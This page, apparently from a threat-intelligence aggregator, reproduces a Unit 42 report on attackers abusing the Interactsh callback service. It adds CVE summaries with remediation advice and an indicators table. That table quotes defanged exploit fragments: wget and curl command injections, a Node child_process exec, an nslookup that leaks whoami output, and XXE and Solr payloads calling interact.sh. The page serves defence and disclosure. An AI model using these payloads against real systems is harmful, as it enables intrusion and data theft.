Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Vulnerabilities mentionedAll →
| CVE | Vulnerability | CVSS | EPSS | Flags | Affected | Exposure | Published |
|---|---|---|---|---|---|---|---|
| CVE-2016-1555 | Unauthenticated Command Injection RCE in NETGEAR Business Wireless Access Points CVE-2016-1555 is a critical (CVSS 9.8) unauthenticated command injection flaw (CWE-77) in the boardData102.php, boardData103.php, boardDataJP.php, boardDataNA.php, and boardDataWW.php management pages of seven NETGEAR wireless access point models. An attacker who can reach these web endpoints over the network can pass crafted input to the scripts and execute arbitrary operating-system commands on the access point, with no login, privilege, or user interaction required. Successful exploitation grants full control of the device, letting attackers use it as a foothold or conscript it into IoT botnets such as BotenaGo, which reportedly uses 33 exploits to target millions of IoT devices. Only the NETGEAR WN604 (firmware before 3.3.3) and the WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 (firmware before 3.5.5.0) are affected. The flaw is listed in CISA's Known Exploited Vulnerabilities catalog (added 2022-03-25), has a public proof-of-concept on Exploit-DB, and carries an EPSS score of 98.3%, so defenders should treat it as actively exploited in the wild. Do: Upgrade the WN604 to firmware 3.3.3 or later and the WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 to firmware 3.5.5.0 or later, per NETGEAR's instructions. Until patched, do not expose these access points' web management interface to the internet and restrict administration to a trusted management VLAN or VPN; if current firmware is no longer obtainable for a given model, consider isolating or replacing the device. Review device and web-server logs for suspicious requests to the boardData*.php endpoints as a sign of attempted or successful exploitation. | 9.8 | 98% | KEV PoC |
| largeorder of tens of thousands of internet-exposed devices; total installed base unknown | |
| CVE-2017-12629 | Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener comm Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr. NVD description · AI analysis pending | 9.8 | 92% | PoC ×2 |
| — | |
| CVE-2017-9506 | The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF). NVD description · AI analysis pending | 6.1 | 72% | PoC ×3 |
| — | |
| CVE-2018-1000600 | A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. NVD description · AI analysis pending | 8.8 | 91% |
| — | ||
| CVE-2018-13354 +1 in the same advisory: …13338 | System command injection in logtable.php in TerraMaster TOS version 3.1.03 allows attackers to execute system commands via the "Event" parameter. System command injection in logtable.php in TerraMaster TOS version 3.1.03 allows attackers to execute system commands via the "Event" parameter. NVD description · AI analysis pending | 9.8 | 23% | PoC |
| — | |
| CVE-2018-14839 | Unauthenticated Command Injection RCE in LG N1A1 NAS LG N1A1 NAS firmware 3718.510 contains an OS command injection flaw (CWE-78) that allows an unauthenticated attacker to execute arbitrary commands on the device. The flaw is triggered over the network by sending crafted parameters in an HTTP POST request to the NAS web interface, requiring no credentials or user interaction. Successful exploitation gives the attacker remote code execution on the device, with full confidentiality, integrity, and availability impact per the critical 9.8 CVSS score. Only LG N1A1 NAS devices (specifically firmware 3718.510 per the disclosure) are affected. Exploitation is confirmed in the wild: the flaw was added to CISA's Known Exploited Vulnerabilities catalog on 2022-03-25, carries a very high 89.4% EPSS probability of exploitation within 30 days, and a public proof-of-concept write-up is available. Do: Apply updates per LG/vendor instructions as required by CISA's KEV listing; given the device's age, if no updated firmware is obtainable, replace or isolate the NAS. Immediately check whether the N1A1 web interface is exposed to the internet (port forwarding, UPnP) and restrict HTTP access to trusted networks or a VPN. Review device logs for suspicious HTTP POST requests and unexpected commands as evidence of compromise. | 9.8 | 89% | KEV PoC |
| nichelikely low thousands of devices at most worldwide, with only a small fraction internet-exposed (estimate; no public scan counts available) | |
| CVE-2018-15517 | The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outboun The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. NVD description · AI analysis pending | 8.6 | 44% | PoC ×2 |
| — | |
| CVE-2018-16167 | LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. NVD description · AI analysis pending | 9.8 | 75% |
| — | ||
| CVE-2019-18394 | A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests. NVD description · AI analysis pending | 9.8 | 32% |
| — | ||
| CVE-2019-2616 | Unauthenticated Data Access and Tampering in Oracle BI Publisher (CVE-2019-2616) Oracle BI Publisher (formerly XML Publisher), a component of Oracle Fusion Middleware, contains an unauthorized-access flaw in its BI Publisher Security subcomponent affecting versions 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. An unauthenticated attacker with network access can trigger it by sending crafted HTTP requests to the BI Publisher service, with no credentials or user interaction required. Successful exploitation yields unauthorized read access to a subset of BI Publisher-accessible data and unauthorized update, insert or delete access to some of that data; because the CVSS scope is 'changed,' attacks may also significantly impact additional products that depend on the component. Any organization running the affected versions — including BI Publisher embedded in other Oracle Fusion Middleware deployments — is at risk. The flaw is confirmed exploited in the wild (CISA KEV, added 2022-03-25) and carries a very high EPSS (~92%), although no public proof-of-concept is known. Do: Apply the Oracle-provided patch per vendor instructions (this 2019 CVE was fixed in the April 2019 Oracle Critical Patch Update), updating any installation on 11.1.1.9.0, 12.2.1.3.0 or 12.2.1.4.0. As an interim mitigation, restrict HTTP access to BI Publisher interfaces to trusted networks only. Given the CISA KEV listing, prioritize patching internet-facing instances and review logs for signs of unauthorized reads or writes to BI Publisher data. | 7.2 | 92% | KEV |
| largetens of thousands of deployments (order-of-magnitude estimate), likely thousands directly exposed on the internet | |
| CVE-2019-2767 | Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security). The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). While the vulnerability is in BI Publisher (formerly XML Publisher), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of BI Publisher (formerly XML Publisher) accessible data as well as unauthorized read access to a subset of BI Publisher (formerly XML Publisher) accessible data. CVSS 3.0 Base Score 7.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N). NVD description · AI analysis pending | 7.2 | 5% |
| — | ||
| CVE-2020-13379 | The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client. This can be used to gain information about the network that Grafana is running on. Furthermore, passing invalid URL objects could be used for DOS'ing Grafana via SegFault. NVD description · AI analysis pending | 8.2 | 100% | PoC ×3 |
| — | |
| CVE-2020-15568 | TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. NVD description · AI analysis pending | 9.8 | 29% | PoC |
| — | |
| CVE-2020-25223 | Unauthenticated Command Injection RCE in Sophos SG UTM WebAdmin CVE-2020-25223 is an unauthenticated OS command injection (CWE-78) in the WebAdmin management interface of Sophos SG UTM appliances. A remote attacker can trigger it by sending a crafted request to the WebAdmin service containing a malicious SID parameter, which is passed to the underlying system without proper sanitization. Successful exploitation yields remote code execution with high impact on confidentiality, integrity and availability (CVSS 3.1 score of 9.8), effectively giving the attacker control of the firewall appliance. Any organization running SG UTM versions prior to v9.705 MR5, v9.607 MR7, or v9.511 MR11 is affected, particularly where the WebAdmin interface is reachable from the internet. The flaw is being actively exploited: it was added to CISA KEV on 2022-03-25, carries a 96.7% EPSS exploitation probability, and public PoC material exists; any ransomware association is currently unknown. Do: Upgrade SG UTM to v9.705 MR5, v9.607 MR7, or v9.511 MR11 (or later) per vendor instructions, consistent with the CISA KEV required action. Until patched, restrict WebAdmin access to trusted management networks or VPN and ensure it is not directly exposed to the internet. Review WebAdmin access logs for anomalous or crafted SID parameter requests that may indicate prior exploitation, and note that ransomware-related use of this bug has not been confirmed. | 9.8 | 97% | KEV PoC ×2 |
| largeon the order of tens of thousands of internet-exposed SG UTM appliances, with a larger total installed base whose WebAdmin exposure is unknown | |
| CVE-2020-28188 | Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter. NVD description · AI analysis pending | 9.8 | 97% | PoC ×2 |
| — | |
| CVE-2020-28871 | Remote code execution in Monitorr v1.7.6m in upload.php allows an unauthorized person to execute arbitrary code on the server-side via an insecure file upload. Remote code execution in Monitorr v1.7.6m in upload.php allows an unauthorized person to execute arbitrary code on the server-side via an insecure file upload. NVD description · AI analysis pending | 9.8 | 86% | PoC ×3 |
| — | |
| CVE-2020-7247 | Unauthenticated Root RCE in OpenSMTPD 6.6 (OpenBSD and Linux) OpenSMTPD 6.6 contains a critical, unauthenticated remote code execution flaw (CWE-78) caused by an incorrect return value from input validation in smtp_mailaddr in smtp_session.c. A remote attacker triggers it during a normal SMTP session by supplying shell metacharacters in the MAIL FROM field; when OpenSMTPD runs with its default (uncommented) configuration, the unsanitized address is passed to a shell during mail delivery, executing attacker-supplied commands. Because the affected delivery path runs with root privileges, the attacker gains arbitrary command execution as root on the mail server. Affected deployments include OpenBSD 6.6, where OpenSMTPD is the default mail daemon, plus Debian, Fedora, and Ubuntu systems shipping OpenSMTPD 6.6. Exploitation is confirmed: the flaw is in CISA's Known Exploited Vulnerabilities catalog (added 2022-03-25), multiple public PoC exploits exist, and EPSS estimates a 99% probability of exploitation within 30 days. Do: Apply vendor updates per CISA's required action: upgrade OpenSMTPD to the patched release (6.6.4p1 or later per vendor advisories) or install the OpenBSD 6.6 errata patch, and pull updated packages from Debian, Fedora, or Ubuntu. Verify your running version and whether the default (uncommented) smtpd.conf is in use; until patched, restrict access to the SMTP service from untrusted networks. Hunt for signs of compromise, such as unexpected commands or processes executed as root by smtpd. | 9.8 | 99% | KEV PoC ×6 |
| large≈10,000–100,000 internet-exposed OpenSMTPD servers (exact count unknown) | |
| CVE-2020-8813 | graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph r graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege. NVD description · AI analysis pending | 8.8 | 74% | PoC ×4 |
| — | |
| CVE-2021-27886 | rakibtg Docker Dashboard before 2021-02-28 allows command injection in backend/utilities/terminal.js via shell metacharacters in the command parameter of an API rakibtg Docker Dashboard before 2021-02-28 allows command injection in backend/utilities/terminal.js via shell metacharacters in the command parameter of an API request. NOTE: this is NOT a Docker, Inc. product. NVD description · AI analysis pending | 9.8 | 46% |
| — | ||
| CVE-2021-27905 | The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is use The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2. NVD description · AI analysis pending | 9.8 | 93% |
| — | ||
| CVE-2021-31755 | Unauthenticated Stack Overflow RCE in Tenda AC11 Router via /goform/setmac Tenda AC11 routers running firmware through 02.03.01.104_CN contain a stack buffer overflow (CWE-787 out-of-bounds write) in the /goform/setmac web endpoint. An unauthenticated attacker can trigger it with a crafted HTTP POST request, overwriting stack memory and executing arbitrary code on the device. Successful exploitation yields full control of the router, enabling traffic interception, lateral movement into the attached home or small-office network, or use in botnets. All AC11 units on affected CN firmware are in scope; no other Tenda products are named in this advisory. The flaw is listed in CISA's Known Exploited Vulnerabilities catalog (added 2021-11-03), carries a very high EPSS score of 86.9%, and public proof-of-concept exploit material is available on GitHub. Do: Upgrade AC11 firmware to a release newer than 02.03.01.104_CN per Tenda's instructions (no specific fixed version is provided in this data), as required by the CISA KEV catalog. Until patched, disable or restrict WAN-facing HTTP management and monitor for unexpected POST requests to /goform/setmac. Review whether the router is reachable from the internet, since unauthenticated network access is all an attacker needs. | 9.8 | 87% | KEV PoC |
| largeplausibly on the order of 100,000+ consumer deployments, with tens of thousands directly internet-exposed (estimate) | |
| CVE-2021-32819 | Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023. NVD description · AI analysis pending | 8.8 | 58% | PoC |
| — | |
| CVE-2021-33544 | Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arb Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. NVD description · AI analysis pending | 7.2 | 95% | PoC |
| — |
Indicators of compromiseauto-extracted · verify before use · export allAll →
| Type | Indicator | Context |
|---|---|---|
| domain | c3167tzyedf0000sfc2ggbo7zoeyyyyyp.interact | ip-addr/search?q={!xmlparser v="<!doctype a system hxxp[:]//c3167tzyedf0000sfc2ggbo7zoeyyyyyp[.]interact.sh/solr/gettingstarted/upload?stream.body={"xx":"yy"}&com |
| domain | c3167tzyedf0000sfc2ggboug8cyyyyyb.interact | r/solr/db/replication?command=fetchindex&masterurl=hxxp[:]//c3167tzyedf0000sfc2ggboug8cyyyyyb[.]interact.sh:80/xxxx&wt=json&httpbasicauthuser=aaa&httpbasicauthpas |
| domain | c32s61pbq16mga0vler0cdnhgbayyyyyn.interact | dule.constructor._load; require('child_process').exec('curl c32s61pbq16mga0vler0cdnhgbayyyyyn[.]interact.sh'); ( CVE-2021-32819 ) hxxp[:]//ip-addr/plugins/servlet |
| domain | c33mg9s2ndhfbpsj7legcddsomayyyypg.interact | r/plugins/servlet/oauth/users/icon-uri?consumeruri=hxxp[:]//c33mg9s2ndhfbpsj7legcddsomayyyypg[.]interact.sh (CVE-2017-9506) hxxp[:]//ip-addr/index.php/system/mail |
| domain | c37e7sraa1psb1c2nso0cd8o9eyyyn94w.interact | 23) hxxp[:]//ip-addr/rest/sharelinks/1.0/link?url=hxxps[:]//c37e7sraa1psb1c2nso0cd8o9eyyyn94w[.]interact.sh hxxp[:]//ip-addr/search.php?search=";wget+hxxp[:]//c4b |
| domain | c38at9vk6tb1j2mah7i0cdeca5yyybucs.interact | bin/","args":["-c","$@|sh",".","echo","nslookup","$(whoami).c38at9vk6tb1j2mah7i0cdeca5yyybucs[.]interact.sh"]}}&wt=json&isshard=true&q=apple hxxp[:]//ip-addr/sear |
| domain | c38r5fq23aksk1ma690gcdmc6doyyahck.interact | !doctype+r+[<!element+r+any+><!entity+%+sp+system+"hxxp[:]//c38r5fq23aksk1ma690gcdmc6doyyahck[.]interact.sh/xxe.xml">%sp;%param1;]>&_xf=excel&_xl=123&template=123 |
| domain | c3jrcoqkfbhrf4rcsmr0cdu5taayynuze.interact | ddr/avatar/test?d=redirect.rhynorater.com?;/bp.blogspot.com/c3jrcoqkfbhrf4rcsmr0cdu5taayynuze[.]interact.sh (CVE-2020-13379) hxxp[:]//ip-addr/adm/krgourl.php?docu |
| domain | c3qsfdg4hl24te8g7rc0cd9erqyygmui6.interact | -4223) hxxp[:]//ip-addr/umbraco/feedproxy.aspx?url=hxxp[:]//c3qsfdg4hl24te8g7rc0cd9erqyygmui6[.]interact.sh (CVE-2012-1301) hxxp[:]//ip-addr/getfavicon?host=hxxp[ |
| domain | c3uhg4emp8vt8fqq370gcd6th6ayyy4b6.interact | h (CVE-2012-1301) hxxp[:]//ip-addr/getfavicon?host=hxxp[:]//c3uhg4emp8vt8fqq370gcd6th6ayyy4b6[.]interact.sh (CVE-2019-18394) (CVE-2020-7247) (CVE-2018-16167) (CVE |
| domain | c44h3el4f1mfla5idm10crrtxqyyyjpp4.interact | ddr/api/container/command?container=&command=;curl hxxp[:]//c44h3el4f1mfla5idm10crrtxqyyyjpp4[.]interact.sh (CVE-2021-27886) hxxp[:]//ip-addr/avatar/test?d=redire |
| domain | c44s021vkr17popa98agcrrhyneyyyd7c.interact | ateselfcert&local=anything&country=aa&state=$(wget hxxp[:]//c44s021vkr17popa98agcrrhyneyyyd7c[.]interact.sh)&organization=anything&organizationunit=anything&commo |
| domain | c45luqovk0lir2vett1gcrf4iyayy468g.interact | 79) hxxp[:]//ip-addr/adm/krgourl.php?document_root=hxxp[:]//c45luqovk0lir2vett1gcrf4iyayy468g[.]interact.sh (CVE-2009-4223) hxxp[:]//ip-addr/umbraco/feedproxy.asp |
| domain | c4b14uqjfg5t9muoh3pgcrca3hoyfrbcr.interact | kencredentialscreator/createtokenbypassword?apiurl=hxxp[:]//c4b14uqjfg5t9muoh3pgcrca3hoyfrbcr[.]interact.sh (CVE-2018-1000600) hxxp[:]//ip-addr/xmlpserver/convert |
| domain | c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k.interact | eract.sh hxxp[:]//ip-addr/search.php?search=";wget+hxxp[:]//c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k[.]interact.sh';" hxxp[:]//ip-addr/index.php?plot=;wget hxxp[:]//c4bf |
| domain | c4b14uqjfg5t9muoh3pgcrqz7oyykqcuq.interact | 17-9506) hxxp[:]//ip-addr/index.php/system/mailconnect/host/c4b14uqjfg5t9muoh3pgcrqz7oyykqcuq[.]interact.sh/port/80/secure (CVE-2018-15517) hxxp[:]//ip-addr/api/c |
| domain | c4bfibtmh0e03d1t5u90crcb9fayzf9dr.interact | teract.sh';" hxxp[:]//ip-addr/index.php?plot=;wget hxxp[:]//c4bfibtmh0e03d1t5u90crcb9fayzf9dr[.]interact.sh |
| domain | c4mqgxkyedf0000ar3d0gnkmaqayyyyyb.interact.sh | the page, the web UI randomly generates an Interactsh link: C4mqgxkyedf0000ar3d0gnkmaqayyyyyb[.]interact[.]sh Figure 2. Example of using Interactsh through the Web U |
| domain | certmngr.cgi | s: Exploits Leveraging Interactsh hxxp[:]//ip-addr/uapi-cgi/certmngr[.]cgi?action=createselfcert&local=anything&country=aa&state=$(w |
| domain | interact.sh | append attacks that use Interactsh. DNS Security has marked interact[.]sh as a malicious site. We also recommend the following acti |
| domain | redirect.rhynorater.com | interact.sh (CVE-2021-27886) hxxp[:]//ip-addr/avatar/test?d=redirect.rhynorater.com?;/bp.blogspot.com/c3jrcoqkfbhrf4rcsmr0cdu5taayynuze[.]inter |
| url | http://c3167tzyedf0000sfc2ggbo7zoeyyyyyp[ | hxxp[:]//ip-addr/search?q={!xmlparser v="<!doctype a system hxxp[:]//c3167tzyedf0000sfc2ggbo7zoeyyyyyp[.]interact.sh/solr/gettingstarted/upload?stream.body={"xx" |
| url | http://c38r5fq23aksk1ma690gcdmc6doyyahck[ | "1.0"+?><!doctype+r+[<!element+r+any+><!entity+%+sp+system+"hxxp[:]//c38r5fq23aksk1ma690gcdmc6doyyahck[.]interact.sh/xxe.xml">%sp;%param1;]>&_xf=excel&_xl=123&te |
| url | http://c44h3el4f1mfla5idm10crrtxqyyyjpp4[ | [:]//ip-addr/api/container/command?container=&command=;curl hxxp[:]//c44h3el4f1mfla5idm10crrtxqyyyjpp4[.]interact.sh (CVE-2021-27886) hxxp[:]//ip-addr/avatar/tes |
| url | http://c44s021vkr17popa98agcrrhyneyyyd7c[ | ction=createselfcert&local=anything&country=aa&state=$(wget hxxp[:]//c44s021vkr17popa98agcrrhyneyyyd7c[.]interact.sh)&organization=anything&organizationunit=anyt |
| url | http://c4b14uqjfg5t9muoh3pgcrca3hoyfrbcr[ | ]githubtokencredentialscreator/createtokenbypassword?apiurl=hxxp[:]//c4b14uqjfg5t9muoh3pgcrca3hoyfrbcr[.]interact.sh (CVE-2018-1000600) hxxp[:]//ip-addr/xmlpserv |
| url | http://c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k[ | 94w[.]interact.sh hxxp[:]//ip-addr/search.php?search=";wget+hxxp[:]//c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k[.]interact.sh';" hxxp[:]//ip-addr/index.php?plot=;wget hxx |
| url | http://c4bfibtmh0e03d1t5u90crcb9fayzf9dr[ | jn8k[.]interact.sh';" hxxp[:]//ip-addr/index.php?plot=;wget hxxp[:]//c4bfibtmh0e03d1t5u90crcb9fayzf9dr[.]interact.sh |
| url | http://ip-addr/adm/krgourl.php?document_root=http[: | oqkfbhrf4rcsmr0cdu5taayynuze[.]interact.sh (CVE-2020-13379) hxxp[:]//ip-addr/adm/krgourl.php?document_root=hxxp[:]//c45luqovk0lir2vett1gcrf4iyayy468g[.]interact.sh (CVE-20 |
| url | http://ip-addr/api/container/command?container=&command=;curl | crqz7oyykqcuq[.]interact.sh/port/80/secure (CVE-2018-15517) hxxp[:]//ip-addr/api/container/command?container=&command=;curl hxxp[:]//c44h3el4f1mfla5idm10crrtxqyyyjpp4[.]interact.sh |
| url | http://ip-addr/avatar/test?d=redirect.rhynorater.com?;/bp.blogspot.com/c3jrcoqkfbhrf4rcsmr0cdu5taayynuze[ | el4f1mfla5idm10crrtxqyyyjpp4[.]interact.sh (CVE-2021-27886) hxxp[:]//ip-addr/avatar/test?d=redirect.rhynorater.com?;/bp.blogspot.com/c3jrcoqkfbhrf4rcsmr0cdu5taayynuze[.]interact.sh (CVE-2020-13379) hxxp[:]//ip-addr/adm/krgour |
| url | http://ip-addr/?defaultFilter=e | asicauthuser=aaa&httpbasicauthpassword=bbb (CVE-2021-27905) hxxp[:]//ip-addr/?defaultFilter=e')); let require = global.require || global.process.mainMo |
| url | http://ip-addr/getfavicon?host=http[: | fdg4hl24te8g7rc0cd9erqyygmui6[.]interact.sh (CVE-2012-1301) hxxp[:]//ip-addr/getfavicon?host=hxxp[:]//c3uhg4emp8vt8fqq370gcd6th6ayyy4b6[.]interact.sh (CVE-20 |
| url | http://ip-addr/index.php?plot=;wget | hxxp[:]//c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k[.]interact.sh';" hxxp[:]//ip-addr/index.php?plot=;wget hxxp[:]//c4bfibtmh0e03d1t5u90crcb9fayzf9dr[.]interact.sh |
| url | http://ip-addr/index.php/system/mailconnect/host/c4b14uqjfg5t9muoh3pgcrqz7oyykqcuq[ | g9s2ndhfbpsj7legcddsomayyyypg[.]interact.sh (CVE-2017-9506) hxxp[:]//ip-addr/index.php/system/mailconnect/host/c4b14uqjfg5t9muoh3pgcrqz7oyykqcuq[.]interact.sh/port/80/secure (CVE-2018-15517) hxxp[:]//ip- |
| url | http://ip-addr/plugins/servlet/oauth/users/icon-uri?consumeruri=http[: | 6mga0vler0cdnhgbayyyyyn[.]interact.sh'); ( CVE-2021-32819 ) hxxp[:]//ip-addr/plugins/servlet/oauth/users/icon-uri?consumeruri=hxxp[:]//c33mg9s2ndhfbpsj7legcddsomayyyypg[.]interact.sh (CVE-20 |
| url | http://ip-addr/rest/sharelinks/1.0/link?url=https[: | 018-13338 CVE-2020-15568) (CVE-2020-28871) (CVE-2020-25223) hxxp[:]//ip-addr/rest/sharelinks/1.0/link?url=hxxps[:]//c37e7sraa1psb1c2nso0cd8o9eyyyn94w[.]interact.sh hxxp[:] |
| url | http://ip-addr/search.php?search= | l=hxxps[:]//c37e7sraa1psb1c2nso0cd8o9eyyyn94w[.]interact.sh hxxp[:]//ip-addr/search.php?search=";wget+hxxp[:]//c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k[.]intera |
| url | http://ip-addr/search?q={!xmlparser | deca5yyybucs[.]interact.sh"]}}&wt=json&isshard=true&q=apple hxxp[:]//ip-addr/search?q={!xmlparser v="<!doctype a system hxxp[:]//c3167tzyedf0000sfc2ggbo7zo |
| url | http://ip-addr/securityrealm/user/admin/descriptorbyname/org.jenkinsci.plugins.github.config[ | g&commonname=anything&days=1&type=anything (CVE-2021-33544) hxxp[:]//ip-addr/securityrealm/user/admin/descriptorbyname/org.jenkinsci.plugins.github.config[.]githubtokencredentialscreator/createtokenbypassword?apiu |
| url | http://ip-addr/solr/db/replication?command=fetchindex&masterurl=http[: | m.body={"xx":"yy"}&commit=true""><a></a>"} (CVE-2017-12629) hxxp[:]//ip-addr/solr/db/replication?command=fetchindex&masterurl=hxxp[:]//c3167tzyedf0000sfc2ggboug8cyyyyyb[.]interact.sh:80/xxxx |
| url | http://ip-addr/solr/select?qt=/config#&&shards=127.0.0.1:8984/solq&stream.body={ | p;%param1;]>&_xf=excel&_xl=123&template=123 (CVE-2019-2767) hxxp[:]//ip-addr/solr/select?qt=/config#&&shards=127.0.0.1:8984/solq&stream.body={"add-listener":{"event":"postcommit","name":"nuclei","clas |
| url | http://ip-addr/uapi-cgi/certmngr[ | d above). Use Case Examples: Exploits Leveraging Interactsh hxxp[:]//ip-addr/uapi-cgi/certmngr[.]cgi?action=createselfcert&local=anything&country=aa&stat |
| url | http://ip-addr/umbraco/feedproxy.aspx?url=http[: | uqovk0lir2vett1gcrf4iyayy468g[.]interact.sh (CVE-2009-4223) hxxp[:]//ip-addr/umbraco/feedproxy.aspx?url=hxxp[:]//c3qsfdg4hl24te8g7rc0cd9erqyygmui6[.]interact.sh (CVE-20 |
| url | http://ip-addr/xmlpserver/convert?xml= | jfg5t9muoh3pgcrca3hoyfrbcr[.]interact.sh (CVE-2018-1000600) hxxp[:]//ip-addr/xmlpserver/convert?xml=<?xml+version="1.0"+?><!doctype+r+[<!element+r+any+><!enti |
Full article1,311 words · extracted from unit42.paloaltonetworks.com · click to collapse
Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we rank the exploits we’ve observed by popularity. In addition, we analyze Interactsh activity distribution in terms of dates and location. Lastly, we have included information about the malicious payloads for your reference.
Customers with Palo Alto Networks Next-Generation Firewall are protected against benign append attacks that use Interactsh.
Interactsh Tool
Unit 42 researchers have been actively monitoring malicious activities in the wild[1][2]. Starting mid-April 2021, we noticed some exploit attempts with the same domain name but different subdomains in the malicious payload. After investigation, we found that the source is a tool that can generate specific URLs for testing on DNS queries and HTTP attempts. This tool became publicly available on April 16, 2021, and we observed the first attempts to abuse it soon after, on April 18, 2021.

Figure 1 shows the GitHub page for the tool, stating that “Interactsh is an Open-Source Solution for Out of band Data Extraction, A tool designed to detect bugs that cause external interactions.” In the following experiment, we interact with the web UI, which is easily found by doing a web search on “interact project discovery.” When a user accesses the page, the web UI randomly generates an Interactsh link:
C4mqgxkyedf0000ar3d0gnkmaqayyyyyb[.]interact[.]sh

We interact with this URL using a browser to check the query trace with the Interactsh UI, as shown in Figure 2. The UI shows the DNS query records and HTTP request for the URL, which means we successfully accessed C4mqgxkyedf0000ar3d0gnkmaqayyyyyb[.]interact[.]sh. In addition, the URL can also be used in the command line if the interactsh-client is installed.
The Payload Interaction
Attackers and researchers can use this tool to test whether an exploit has been successful. Figure 3 shows such an example.

We picked an exploit attempt which used the Interactsh tool – in this case, a Generic IoT Device Remote Command Execution Vulnerability. The attacker sends an HTTP post request and passes a command by key parameter in the post body. Here a wget command was used to access a command and control (C2) server, which was created via the Interactsh tool. By watching whether the C2 server receives the request, it can be determined whether this exploit was successful.
Exploits Leveraging Interactsh
